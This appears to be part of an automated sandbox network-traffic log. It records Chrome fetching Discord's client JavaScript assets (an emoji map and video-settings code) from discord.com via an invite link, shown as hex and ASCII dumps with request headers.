                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 22 2c 22 2e 2f 31 66 31 65 37 2d 31 66 31 66 65 2e 73 76 67 22 3a 22 36 30 37 36 39 32 22 2c 22 2e 2f 31 66 31 65 37 2d 31 66 31 66 66 2e 73 76 67 22 3a 22 31 31 38 32 36 38 22 2c 22 2e 2f 31 66 31 65 37 2e 73 76 67 22 3a 22 31 39 35 31 30 33 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 36 2e 73 76 67 22 3a 22 31 35 36 35 30 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 38 2e 73 76 67 22 3a 22 38 31 30 38 33 34 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 39 2e 73 76 67 22 3a 22 36 37 38 38 32 36 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 62 2e 73 76 67 22 3a 22 33 35 30 31 33 31 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 63 2e 73 76 67 22 3a 22 32 31 35 39 31 36 22 2c 22 2e 2f 31 66 31 65 38 2d 31 66 31 65 64 2e 73 76 67 22 3a 22 34 30 31 31 32 37 22
                                                                          Data Ascii: ","./1f1e7-1f1fe.svg":"607692","./1f1e7-1f1ff.svg":"118268","./1f1e7.svg":"195103","./1f1e8-1f1e6.svg":"15650","./1f1e8-1f1e8.svg":"810834","./1f1e8-1f1e9.svg":"678826","./1f1e8-1f1eb.svg":"350131","./1f1e8-1f1ec.svg":"215916","./1f1e8-1f1ed.svg":"401127"
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 31 66 31 65 62 2e 73 76 67 22 3a 22 32 30 38 35 35 30 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 36 2e 73 76 67 22 3a 22 37 35 37 39 31 32 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 37 2e 73 76 67 22 3a 22 35 33 35 33 38 32 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 39 2e 73 76 67 22 3a 22 36 39 34 34 32 34 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 61 2e 73 76 67 22 3a 22 35 31 33 38 30 38 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 62 2e 73 76 67 22 3a 22 36 31 35 34 33 39 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 63 2e 73 76 67 22 3a 22 37 32 35 39 33 34 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 64 2e 73 76 67 22 3a 22 33 38 34 37 38 39 22 2c 22 2e 2f 31 66 31 65 63 2d 31 66 31 65 65 2e 73 76 67 22 3a 22 39 38 31 30 38 33 22 2c 22 2e 2f
                                                                          Data Ascii: 1f1eb.svg":"208550","./1f1ec-1f1e6.svg":"757912","./1f1ec-1f1e7.svg":"535382","./1f1ec-1f1e9.svg":"694424","./1f1ec-1f1ea.svg":"513808","./1f1ec-1f1eb.svg":"615439","./1f1ec-1f1ec.svg":"725934","./1f1ec-1f1ed.svg":"384789","./1f1ec-1f1ee.svg":"981083","./
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 73 76 67 22 3a 22 31 34 34 34 33 34 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 32 2e 73 76 67 22 3a 22 32 37 35 37 36 31 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 33 2e 73 76 67 22 3a 22 37 35 35 37 30 34 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 35 2e 73 76 67 22 3a 22 31 37 37 36 31 36 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 37 2e 73 76 67 22 3a 22 34 35 30 39 32 39 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 63 2e 73 76 67 22 3a 22 37 39 39 37 32 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 65 2e 73 76 67 22 3a 22 31 38 37 30 30 33 22 2c 22 2e 2f 31 66 31 66 30 2d 31 66 31 66 66 2e 73 76 67 22 3a 22 35 39 37 35 37 30 22 2c 22 2e 2f 31 66 31 66 30 2e 73 76 67 22 3a 22 34 33 36 32 39 37 22 2c 22 2e 2f 31 66 31 66 31 2d 31 66 31 65 36 2e 73
                                                                          Data Ascii: svg":"144434","./1f1f0-1f1f2.svg":"275761","./1f1f0-1f1f3.svg":"755704","./1f1f0-1f1f5.svg":"177616","./1f1f0-1f1f7.svg":"450929","./1f1f0-1f1fc.svg":"79972","./1f1f0-1f1fe.svg":"187003","./1f1f0-1f1ff.svg":"597570","./1f1f0.svg":"436297","./1f1f1-1f1e6.s
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 67 22 3a 22 36 35 32 34 32 34 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 65 63 2e 73 76 67 22 3a 22 37 39 36 39 32 31 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 65 65 2e 73 76 67 22 3a 22 36 31 35 38 30 35 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 31 2e 73 76 67 22 3a 22 31 36 34 31 34 35 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 34 2e 73 76 67 22 3a 22 36 30 38 36 36 30 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 35 2e 73 76 67 22 3a 22 33 30 32 36 33 34 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 37 2e 73 76 67 22 3a 22 31 34 35 35 38 34 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 61 2e 73 76 67 22 3a 22 37 37 33 36 38 22 2c 22 2e 2f 31 66 31 66 33 2d 31 66 31 66 66 2e 73 76 67 22 3a 22 35 33 35 31 34 35 22 2c 22 2e 2f 31 66 31 66 33 2e 73 76 67
                                                                          Data Ascii: g":"652424","./1f1f3-1f1ec.svg":"796921","./1f1f3-1f1ee.svg":"615805","./1f1f3-1f1f1.svg":"164145","./1f1f3-1f1f4.svg":"608660","./1f1f3-1f1f5.svg":"302634","./1f1f3-1f1f7.svg":"145584","./1f1f3-1f1fa.svg":"77368","./1f1f3-1f1ff.svg":"535145","./1f1f3.svg
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 37 2e 73 76 67 22 3a 22 31 39 32 39 30 32 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 38 2e 73 76 67 22 3a 22 31 33 38 37 33 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 39 2e 73 76 67 22 3a 22 39 31 30 35 38 31 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 62 2e 73 76 67 22 3a 22 35 38 35 30 36 33 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 64 2e 73 76 67 22 3a 22 31 34 33 39 31 37 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 65 2e 73 76 67 22 3a 22 32 35 35 32 33 31 22 2c 22 2e 2f 31 66 31 66 38 2d 31 66 31 66 66 2e 73 76 67 22 3a 22 35 39 36 38 38 37 22 2c 22 2e 2f 31 66 31 66 38 2e 73 76 67 22 3a 22 35 37 38 30 31 31 22 2c 22 2e 2f 31 66 31 66 39 2d 31 66 31 65 36 2e 73 76 67 22 3a 22 38 30 35 39 38 38 22 2c 22
                                                                          Data Ascii: "./1f1f8-1f1f7.svg":"192902","./1f1f8-1f1f8.svg":"13873","./1f1f8-1f1f9.svg":"910581","./1f1f8-1f1fb.svg":"585063","./1f1f8-1f1fd.svg":"143917","./1f1f8-1f1fe.svg":"255231","./1f1f8-1f1ff.svg":"596887","./1f1f8.svg":"578011","./1f1f9-1f1e6.svg":"805988","
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 22 35 33 39 38 31 37 22 2c 22 2e 2f 31 66 31 66 65 2e 73 76 67 22 3a 22 38 36 39 36 37 22 2c 22 2e 2f 31 66 31 66 66 2d 31 66 31 65 36 2e 73 76 67 22 3a 22 37 30 36 30 38 33 22 2c 22 2e 2f 31 66 31 66 66 2d 31 66 31 66 32 2e 73 76 67 22 3a 22 38 35 30 38 34 38 22 2c 22 2e 2f 31 66 31 66 66 2d 31 66 31 66 63 2e 73 76 67 22 3a 22 33 36 34 36 34 37 22 2c 22 2e 2f 31 66 31 66 66 2e 73 76 67 22 3a 22 33 36 36 39 36 34 22 2c 22 2e 2f 31 66 32 30 31 2e 73 76 67 22 3a 22 33 30 36 32 31 31 22 2c 22 2e 2f 31 66 32 30 32 2e 73 76 67 22 3a 22 33 35 35 35 38 32 22 2c 22 2e 2f 31 66 32 31 61 2e 73 76 67 22 3a 22 35 30 36 38 36 37 22 2c 22 2e 2f 31 66 32 32 66 2e 73 76 67 22 3a 22 36 39 34 35 36 35 22 2c 22 2e 2f 31 66 32 33 32 2e 73 76 67 22 3a 22 35 39 38 30 37 31 22
                                                                          Data Ascii: "539817","./1f1fe.svg":"86967","./1f1ff-1f1e6.svg":"706083","./1f1ff-1f1f2.svg":"850848","./1f1ff-1f1fc.svg":"364647","./1f1ff.svg":"366964","./1f201.svg":"306211","./1f202.svg":"355582","./1f21a.svg":"506867","./1f22f.svg":"694565","./1f232.svg":"598071"


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          276192.168.2.550010162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:13 UTC866OUTGET /assets/21413.04451f046a440f45bd24.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
                                                                          2023-12-10 16:45:14 UTC1132INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 32 36 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 33 61 66 61 66 37 34 34 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:14 GMTContent-Type: application/javascriptContent-Length: 19268Connection: closeCF-Ray: 8336f503afaf7445-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:14 UTC237INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 31 34 31 33 22 5d 2c 7b 32 37 35 36 32 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 36 61 64 63 36 33 30 66 65 30 35 33 34 38 39 35 66 66 30 66 2e 6d 70 34 22 7d 2c 38 35 31 37 30 33 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 66 33 63 39 65 35 36 37 35 32 65 36 65 37 64 61 65 36 31 35 2e 6d 70 34 22 7d 2c 39
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["21413"],{27562:function(t,e,n){"use strict";t.exports=n.p+"6adc630fe0534895ff0f.mp4"},851703:function(t,e,n){"use strict";t.exports=n.p+"f3c9e56752e6e7dae615.mp4"},9
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 30 32 35 37 37 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 36 31 32 32 30 64 30 30 65 36 32 37 65 37 66 34 61 34 34 30 2e 70 6e 67 22 7d 2c 33 35 31 32 38 38 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 33 66 38 34 31 65 39 65 64 66 30 66 38 63 39 30 63 61 32 2e 6d 70 34 22 7d 2c 35 39 35 37 32 36 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 74 2e 65 78 70 6f 72 74 73 3d 6e 2e 70 2b 22 63 36 39 34 36 37 35 33 35 31 62 65 32 63 64 38 39 32 33 62 2e 70 6e 67 22 7d 2c 34 36 32 36 34 31 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29
                                                                          Data Ascii: 02577:function(t,e,n){"use strict";t.exports=n.p+"61220d00e627e7f4a440.png"},351288:function(t,e,n){"use strict";t.exports=n.p+"c3f841e9edf0f8c90ca2.mp4"},595726:function(t,e,n){"use strict";t.exports=n.p+"c694675351be2cd8923b.png"},462641:function(t,e,n)
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 20 35 3b 63 61 73 65 20 31 35 3a 72 65 74 75 72 6e 20 31 35 3b 63 61 73 65 20 33 30 3a 72 65 74 75 72 6e 20 33 30 3b 63 61 73 65 20 36 30 3a 72 65 74 75 72 6e 20 36 30 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 45 72 72 6f 72 28 22 55 6e 6b 6e 6f 77 6e 20 66 72 61 6d 65 20 72 61 74 65 3a 20 22 2e 63 6f 6e 63 61 74 28 74 29 29 7d 7d 28 6f 3d 69 7c 7c 28 69 3d 7b 7d 29 29 5b 6f 2e 52 45 53 4f 4c 55 54 49 4f 4e 5f 34 38 30 3d 34 38 30 5d 3d 22 52 45 53 4f 4c 55 54 49 4f 4e 5f 34 38 30 22 2c 6f 5b 6f 2e 52 45 53 4f 4c 55 54 49 4f 4e 5f 37 32 30 3d 37 32 30 5d 3d 22 52 45 53 4f 4c 55 54 49 4f 4e 5f 37 32 30 22 2c 6f 5b 6f 2e 52 45 53 4f 4c
                                                                          Data Ascii: )}}function f(t){switch(t){case 5:return 5;case 15:return 15;case 30:return 30;case 60:return 60;default:throw Error("Unknown frame rate: ".concat(t))}}(o=i||(i={}))[o.RESOLUTION_480=480]="RESOLUTION_480",o[o.RESOLUTION_720=720]="RESOLUTION_720",o[o.RESOL
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 2c 7b 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 30 38 30 2c 66 70 73 3a 36 30 2c 67 75 69 6c 64 50 72 65 6d 69 75 6d 54 69 65 72 3a 6c 2e 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 2e 54 49 45 52 5f 32 2c 71 75 61 6c 69 74 79 3a 64 2e 53 74 72 65 61 6d 51 75 61 6c 69 74 69 65 73 2e 4d 49 44 5f 53 54 52 45 41 4d 49 4e 47 5f 51 55 41 4c 49 54 59 7d 2c 7b 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 30 38 30 2c 66 70 73 3a 33 30 2c 67 75 69 6c 64 50 72 65 6d 69 75 6d 54 69 65 72 3a 6c 2e 42 6f 6f 73 74 65 64 47 75 69 6c 64 54 69 65 72 73 2e 54 49 45 52 5f 32 2c 71 75 61 6c 69 74 79 3a 64 2e 53 74 72 65 61 6d 51 75 61 6c 69 74 69 65 73 2e 4d 49 44 5f 53 54 52 45 41 4d 49 4e 47 5f 51 55 41 4c 49 54 59 7d 2c 7b 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 30 38 30 2c 66 70 73
                                                                          Data Ascii: ,{resolution:1080,fps:60,guildPremiumTier:l.BoostedGuildTiers.TIER_2,quality:d.StreamQualities.MID_STREAMING_QUALITY},{resolution:1080,fps:30,guildPremiumTier:l.BoostedGuildTiers.TIER_2,quality:d.StreamQualities.MID_STREAMING_QUALITY},{resolution:1080,fps
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 41 75 64 69 6f 43 6f 6e 74 65 78 74 46 6f 72 50 72 6f 74 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 39 33 38 38 35 30 22 29 2c 75 3d 6e 28 22 37 37 33 33 36 34 22 29 2c 72 3d 6e 28 22 38 32 39 35 33 36 22 29 2c 6f 3d 6e 28 22 33 39 37 33 33 36 22 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 74 2c 65 29 7b 6c 65 74 20 6e 3d 65 3d 3d 3d 75 2e 4d 65 64 69 61 45 6e 67 69 6e 65 43 6f 6e 74 65 78 74 54 79 70 65 73 2e 53 54 52 45 41 4d 3f 69 2e 41 75 64 69 6f 53 65 74 74 69 6e 67 73 44 65 66 61 75 6c 74 56 6f 6c 75 6d 65 73 2e 53 54 52 45 41 4d 3a 69 2e 41 75 64 69 6f 53 65 74 74 69 6e 67 73 44 65 66 61 75 6c 74 56 6f 6c 75 6d 65 73 2e 55 53 45 52 3b 72 65 74 75 72 6e 20 31 3e 4d 61 74 68 2e 61 62 73 28 28 30
                                                                          Data Ascii: AudioContextForProto:function(){return s}});var i=n("938850"),u=n("773364"),r=n("829536"),o=n("397336");function a(t,e){let n=e===u.MediaEngineContextTypes.STREAM?i.AudioSettingsDefaultVolumes.STREAM:i.AudioSettingsDefaultVolumes.USER;return 1>Math.abs((0
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 65 72 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 65 72 72 6f 72 41 70 70 6c 79 69 6e 67 4d 65 64 69 61 46 69 6c 74 65 72 53 65 74 74 69 6e 67 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 54 7d 7d 29 3b 76 61 72 20 69 3d 6e 28 22 38 37 32 37 31 37 22 29 2c 75 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 72 3d 6e 28 22 38 37 32 31 37 33 22 29 2c 6f 3d 6e 28 22 34 32 38 38 37 22 29 2c 61 3d 6e 28 22 36 39 37 32 31 38 22 29 2c 73 3d 6e 28 22 36 35 39 35 35 38 22 29 2c 6c 3d 6e 28 22 32 33 39 34 34 38 22 29 2c 64 3d 6e 28 22 32 38 34 32 33 31 22 29 2c 63 3d 6e 28 22 34 39 31 31 31 22 29 3b 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 5f 28 29 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 69 2e 64 65 66 61 75 6c
                                                                          Data Ascii: erSettings:function(){return S},errorApplyingMediaFilterSettings:function(){return T}});var i=n("872717"),u=n("913144"),r=n("872173"),o=n("42887"),a=n("697218"),s=n("659558"),l=n("239448"),d=n("284231"),c=n("49111");async function _(){let t=await i.defaul
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 6f 6e 3a 65 2e 62 6f 64 79 7d 29 7d 65 6c 73 65 20 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 56 49 44 45 4f 5f 53 41 56 45 5f 4c 41 53 54 5f 55 53 45 44 5f 42 41 43 4b 47 52 4f 55 4e 44 5f 4f 50 54 49 4f 4e 22 2c 62 61 63 6b 67 72 6f 75 6e 64 4f 70 74 69 6f 6e 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 69 73 53 75 70 70 6f 72 74 65 64 28 29 26 26 75 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4d 45 44 49 41 5f 45 4e 47 49 4e 45 5f 41 50 50 4c 59 5f 4d 45 44 49 41 5f 46 49 4c 54 45 52 5f 53 45 54 54 49 4e 47 53 22 2c 73 65 74 74 69 6e 67 73 3a 74 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 29 7b 6f 2e 64 65 66 61 75 6c 74 2e 69 73 53 75 70 70 6f 72
                                                                          Data Ascii: on:e.body})}else u.default.dispatch({type:"VIDEO_SAVE_LAST_USED_BACKGROUND_OPTION",backgroundOption:t})}function A(t){o.default.isSupported()&&u.default.dispatch({type:"MEDIA_ENGINE_APPLY_MEDIA_FILTER_SETTINGS",settings:t})}function S(){o.default.isSuppor
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 4c 54 45 52 5f 41 53 53 45 54 53 5f 46 45 54 43 48 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 7b 61 73 73 65 74 73 3a 65 7d 3d 74 3b 45 3d 65 2e 72 65 64 75 63 65 28 28 74 2c 65 29 3d 3e 28 7b 2e 2e 2e 74 2c 5b 65 2e 69 64 5d 3a 65 7d 29 2c 7b 7d 29 7d 2c 56 49 44 45 4f 5f 46 49 4c 54 45 52 5f 41 53 53 45 54 5f 55 50 4c 4f 41 44 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 7b 76 69 64 65 6f 46 69 6c 74 65 72 41 73 73 65 74 3a 65 7d 3d 74 3b 45 3d 7b 2e 2e 2e 45 2c 5b 65 2e 69 64 5d 3a 65 7d 7d 2c 56 49 44 45 4f 5f 46 49 4c 54 45 52 5f 41 53 53 45 54 5f 44 45 4c 45 54 45 5f 53 55 43 43 45 53 53 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 7b 76 69 64 65 6f 46 69 6c 74 65 72 41 73 73 65 74 3a 65 7d
                                                                          Data Ascii: LTER_ASSETS_FETCH_SUCCESS:function(t){let{assets:e}=t;E=e.reduce((t,e)=>({...t,[e.id]:e}),{})},VIDEO_FILTER_ASSET_UPLOAD_SUCCESS:function(t){let{videoFilterAsset:e}=t;E={...E,[e.id]:e}},VIDEO_FILTER_ASSET_DELETE_SUCCESS:function(t){let{videoFilterAsset:e}
                                                                          2023-12-10 16:45:14 UTC1369INData Raw: 49 63 6f 6e 48 61 73 68 29 28 74 2e 61 73 73 65 74 29 7c 7c 28 30 2c 61 2e 69 73 56 69 64 65 6f 41 73 73 65 74 48 61 73 68 29 28 74 2e 61 73 73 65 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 3f 22 56 69 64 65 6f 20 42 61 63 6b 67 72 6f 75 6e 64 22 3a 22 4e 6f 6e 65 22 7d 66 75 6e 63 74 69 6f 6e 20 45 28 74 29 7b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 22 4e 6f 6e 65 22 3b 69 66 28 64 28 74 29 29 72 65 74 75 72 6e 22 43 75 73 74 6f 6d 22 3b 69 66 28 22 62 6c 75 72 22 3d 3d 3d 74 29 72 65 74 75 72 6e 22 42 6c 75 72 22 3b 65 6c 73 65 20 72 65 74 75 72 6e 22 50 72 65 73 65 74 20 2d 20 22 2e 63 6f 6e 63 61 74 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 20 73 2e
                                                                          Data Ascii: IconHash)(t.asset)||(0,a.isVideoAssetHash)(t.asset))}function f(t){return null!=t?"Video Background":"None"}function E(t){if(null==t)return"None";if(d(t))return"Custom";if("blur"===t)return"Blur";else return"Preset - ".concat(function(t){switch(t){case s.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          277192.168.2.550013162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:14 UTC866OUTGET /assets/75676.8481ee3ef6c0d7c670c6.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=Uwh5q_mEMGl8qgOKdG_NoZP7zcIvxDvF3mDMx2cCstU-1702226713424-0-604800000
                                                                          2023-12-10 16:45:14 UTC1118INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 35 38 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 30 35 63 62 64 39 64 61 32 66 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:14 GMTContent-Type: application/javascriptContent-Length: 13582Connection: closeCF-Ray: 8336f505cbd9da2f-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
